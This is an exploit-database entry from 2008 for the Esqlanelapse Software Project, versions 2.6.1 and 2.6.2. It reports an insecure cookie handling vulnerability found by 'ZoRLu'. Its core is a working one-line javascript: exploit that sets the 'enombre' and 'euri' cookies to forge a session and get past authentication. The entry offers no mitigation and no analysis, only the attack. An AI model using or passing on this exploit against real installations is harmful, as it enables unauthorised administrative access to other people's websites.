Esqlanelapse Software Project <= 2.6.2 Insecure Cookie Handling Vuln

2008-09-26T00:00:00
ID 1337DAY-ID-3768
Type zdt
Reporter ZoRLu
Modified 2008-09-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Esqlanelapse Software Project <= 2.6.2 Insecure Cookie Handling Vuln
====================================================================


[~] Esqlanelapse Software Project
[~]
[~] version: 2.6.1  & 2.6.2
[~]
[~] Insecure Cookie Handling Vulnerability
[~]
[~] donwload: http://sourceforge.net/project/showfiles.php?group_id=118575&package_id=129141&release_id=519061
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 26.09.2008
[~]
[~] -----------------------------------------------------------

Exploit:

javascript:document.cookie = "enombre=nombre; path=/"; document.cookie = "euri=visitor_uri; path=/";

[~]----------------------------------------------------------------------




#  0day.today [2018-04-11]  #